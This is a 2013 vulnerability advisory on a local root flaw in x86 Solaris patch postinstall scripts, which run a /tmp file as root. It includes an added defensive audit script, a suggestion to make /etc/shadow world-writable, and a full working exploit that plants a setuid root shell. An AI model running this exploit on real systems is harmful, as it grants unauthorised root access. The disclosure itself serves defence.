Solaris Recommended Patch Cluster 6/19 local root on x86


Larry W. Cashdollar
7/3/2013
@_larry0

If the system administrator is updating the system using Update Manager or smpatch (multi-user mode), a local user can execute commands as root. This only affects x86 systems, because the code resides under a case statement that checks that the platform is Intel-based.

Local root:

Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.

./144751-01/SUNWos86r/install/postinstall

   if [ -s /tmp/diskette_rc.d/rcs9.sh ]
   then
           /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
   fi

Inject entries into driver_aliases? Research the config file; maybe we can load our own library/driver?

   # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
   TMPFILE=/tmp/ncrstmp
   sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
   cp $TMPFILE ${BASEDIR}/etc/driver_aliases

./141445-09/SUNWos86r/install/postinstall

   if [ -s /tmp/diskette_rc.d/rcs9.sh ]
   then
           /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
   fi

Well, it looks like you've got a few chances to abuse it:

larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall
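
An added example, not part of the original advisory or the vendor's code: a pre-patch check that generalizes the find/grep above to any install script handing a /tmp path to a shell, and reports whether /tmp/diskette_rc.d and rcs9.sh are absent or root-owned and not group/other writable. It assumes a POSIX shell; the function names, the trusted-UID parameter and the PATCH-A/PATCH-B sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (assumes a POSIX shell): pre-patch audit for this issue.

# List install scripts under DIR that hand a path under /tmp to a shell.
flag_tmp_exec() {
    find "$1" -type f -name '*install' -exec grep -l 'sh  */tmp/' {} \; | sort
}

# Succeed only if PATH is absent, or is a non-symlink owned by TRUSTED_UID
# (default 0) that neither group nor other can write to.
staging_is_safe() {
    p=$1; trusted=${2:-0}
    if [ -h "$p" ]; then return 1; fi
    if [ ! -e "$p" ]; then return 0; fi
    set -- $(ls -ldn "$p" | awk '{print $1, $3}')   # $1 = mode, $2 = owner uid
    [ "$2" = "$trusted" ] || return 1
    case $1 in
        ?????w*|????????w*) return 1 ;;             # group- or other-writable
    esac
    return 0
}

# Constructed sample tree: PATCH-A carries the lines quoted in the advisory.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/PATCH-A/SUNWos86r/install" "$d/PATCH-B/SUNWexample/install"
    cat > "$d/PATCH-A/SUNWos86r/install/postinstall" <<'EOF'
if [ -s /tmp/diskette_rc.d/rcs9.sh ]
then
    /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
fi
EOF
    echo 'exit 0' > "$d/PATCH-B/SUNWexample/install/postinstall"
    echo "$d"
}

tree=$(demo_tree)
echo "install scripts that run a file from /tmp:"
flag_tmp_exec "$tree"
for path in /tmp/diskette_rc.d /tmp/diskette_rc.d/rcs9.sh; do
    if staging_is_safe "$path"; then
        echo "ok: $path"
    else
        echo "STOP: $path exists and is not root-controlled; inspect before patching"
    fi
done
rm -rf "$tree"
```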

Pseudo PoC:

Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.

According to the code, if the file exists it is simply executed. Easy.
chmod 666 /etc/shadow would be easy.

Exploit:

#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh 
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)


echo "[+] Creating evil shell"

cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setreuid (0, 0);
  setregid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
EOF

echo "[+] Hope you've got gcc on here, compiling..."

gcc r00t.c -o /tmp/r00t

mkdir -p /tmp/diskette_rc.d/

echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"

until [  -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t